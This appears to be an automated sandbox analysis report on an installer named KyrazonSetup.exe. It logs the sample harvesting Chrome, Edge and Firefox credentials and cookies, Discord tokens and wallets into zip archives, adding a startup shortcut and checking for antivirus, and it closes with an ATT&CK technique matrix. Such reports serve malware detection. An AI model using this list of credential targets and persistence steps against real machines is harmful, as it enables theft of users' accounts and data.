Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where /r . data.sqlite
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe c:\users\user\appdata\local\programs\kyrazongodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\shortcut.exe /a:c "/f:c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\kyrazongodot.lnk" /t:c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --gpu-preferences=waaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaaaaaa4aaaaaaaaaaaaaaaeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaaaaaaayaaaaaaaaaagaaaaaaaaacaaaaaaaaaaiaaaaaaaaaa== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe "c:\users\user\appdata\local\programs\kyrazongodot\kyrazongodot.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\kyrazongodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\CURQNKVOIX.png VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DTBZGIOOSO.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\NIKHQAIQAU.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\RAYHIWGKDI.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\HTAGVDFUIE VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\IPKGELNTQY VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\JSDNGYCOWY VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\KATAXZVCPS.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Music VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\ONBQCLYSPU.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\ONBQCLYSPU.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Applications VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Applications VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Discord Tokens VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Microsoft_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe
Queries volume information:
  • C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Queries volume information:
  • C:\Windows\System32\drivers\etc\hosts VolumeInformation
  • C:\ VolumeInformation
  • C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources VolumeInformation
  • C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar VolumeInformation
  • C:\Users\user\AppData\Roaming\KyrazonGodot\Local State VolumeInformation
  • C:\Windows\System32\drivers\etc\hosts VolumeInformation
  • C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json VolumeInformation
  • C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js VolumeInformation
  • C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
  • C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
  • C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
  • C:\Users\user\Downloads VolumeInformation
  • C:\Users\user\Downloads\CURQNKVOIX.png VolumeInformation
  • C:\Users\user\Downloads\DVWHKMNFNN.jpg VolumeInformation
  • C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
  • C:\Users\user\Downloads\KATAXZVCPS.mp3 VolumeInformation
  • C:\Users\user\Downloads\KATAXZVCPS.xlsx VolumeInformation
  • C:\Users\user\Downloads\NIKHQAIQAU.jpg VolumeInformation
  • C:\Users\user\Downloads\ONBQCLYSPU.docx VolumeInformation
  • C:\Users\user\Downloads\UMMBDNEQBN.png VolumeInformation
  • C:\Users\user\Downloads\VLZDGUKUTZ.xlsx VolumeInformation
  • C:\Users\user\Downloads\XZXHAVGRAG.xlsx VolumeInformation
  • C:\Users\user\Downloads\YPSIACHYXW.jpg VolumeInformation
  • C:\Users\user\Downloads\YPSIACHYXW.pdf VolumeInformation
  • C:\Users\user\Downloads\desktop.ini VolumeInformation
  • C:\Users\user\Documents\DTBZGIOOSO VolumeInformation
  • C:\Users\user\Documents\DVWHKMNFNN.xlsx VolumeInformation
  • C:\Users\user\Music VolumeInformation
  • C:\Users\user\Documents\NIKHQAIQAU.jpg VolumeInformation
  • C:\Users\user\Documents\NWTVCDUMOB.png VolumeInformation
  • C:\Users\user\Documents\XZXHAVGRAG.docx VolumeInformation
  • C:\Users\user\Documents\YPSIACHYXW.jpg VolumeInformation
  • C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformation
  • C:\Users\user\Desktop\NIKHQAIQAU VolumeInformation
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
  • C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3 VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Applications VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Browser Extensions VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies\Google_Default.txt VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Microsoft_Default.txt VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Wallets VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Applications VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies\Google_Default.txt VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Google_Default.txt VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords VolumeInformation
  • C:\Users\user\AppData\Local\Temp VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3.zip VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Applications VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Discord Tokens VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies\Google_Default.txt VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Microsoft_Default.txt VolumeInformation
  • C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Google_Default.txt VolumeInformation
  • C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\KyrazonSetup.exe
Code function: 0_2_0040320C EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, ExitProcess, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess, 0_2_0040320C
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\conhost.exe
WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
File opened:
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
  • C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
  • C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
  • C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
  • C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
  • C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
  • C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
  • C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
  • C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
File attributes queried:
  • C:\Users\user\AppData\Local\Discord
  • C:\Users\user\AppData\Local\DiscordCanary
  • C:\Users\user\AppData\Local\DiscordPTB
  • C:\Users\user\AppData\Local\DiscordDevelopment
Directory queried:
  • C:\Users\user\Documents
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 31 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 13 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 12 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 Windows Service | 1 Access Token Manipulation | 2 Obfuscated Files or Information | LSASS Memory | 46 System Information Discovery | Remote Desktop Protocol | 11 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 2 Registry Run Keys / Startup Folder | 1 Windows Service | 1 DLL Side-Loading | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Process Injection | 11 Masquerading | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Clipboard Data | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 2 Registry Run Keys / Startup Folder | 1 Virtualization/Sandbox Evasion | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Process Injection | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
[Behavior graph (image not reproduced). Behavior Graph ID: 1489101, Sample: KyrazonSetup.exe, Startdate: 06/08/2024, Architecture: WINDOWS, Score: 60]

Source | Detection | Scanner | Label | Link
KyrazonSetup.exe | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Programs\KyrazonGodot\d3dcompiler_47.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Programs\KyrazonGodot\ffmpeg.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.node | 4% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.node | 4% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.node | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\KyrazonGodot.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\d3dcompiler_47.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\ffmpeg.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libEGL.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libGLESv2.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\elevate.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vulkan-1.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\SpiderBanner.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\System.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsExec.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsis7z.dll | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
